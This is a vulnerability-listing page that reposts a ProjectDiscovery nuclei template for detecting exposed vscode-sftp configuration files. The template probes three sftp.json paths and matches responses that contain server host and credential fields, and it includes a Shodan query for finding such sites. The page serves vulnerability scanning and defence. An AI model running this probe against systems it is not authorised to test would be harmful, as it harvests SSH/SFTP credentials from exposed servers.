vscode-sftp: VSCode SFTP File Exposure

日期: 2025-08-01 | 影响软件: VS Code SFTP | POC: 已公开

漏洞描述

It discloses sensitive files created by vscode-sftp for VSCode, contains SFTP/SSH server details and credentials.

PoC代码[已公开]

id: vscode-sftp

info:
  name: VSCode SFTP File Exposure
  author: geeknik
  severity: high
  description: |
    It discloses sensitive files created by vscode-sftp for VSCode, contains SFTP/SSH server details and credentials.
  classification:
    cpe: cpe:2.3:a:microsoft:visual_studio_code:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: microsoft
    product: visual_studio_code
    shodan-query: html:"sftp.json"
  tags: exposure,vscode,sftp,ssh,files,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/sftp.json"
      - "{{BaseURL}}/.config/sftp.json"
      - "{{BaseURL}}/.vscode/sftp.json"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"name":'
          - '"host":'
          - '"protocol":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210091514d54631afece9c873ce8cce438ffaea3c2139099371e79dc08737c3be154022039a0d14b55873a7432b0d93d1f18a33a7c13f1c4fa1b476cb29882db93c8b590:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/exposures/files/vscode-sftp.yaml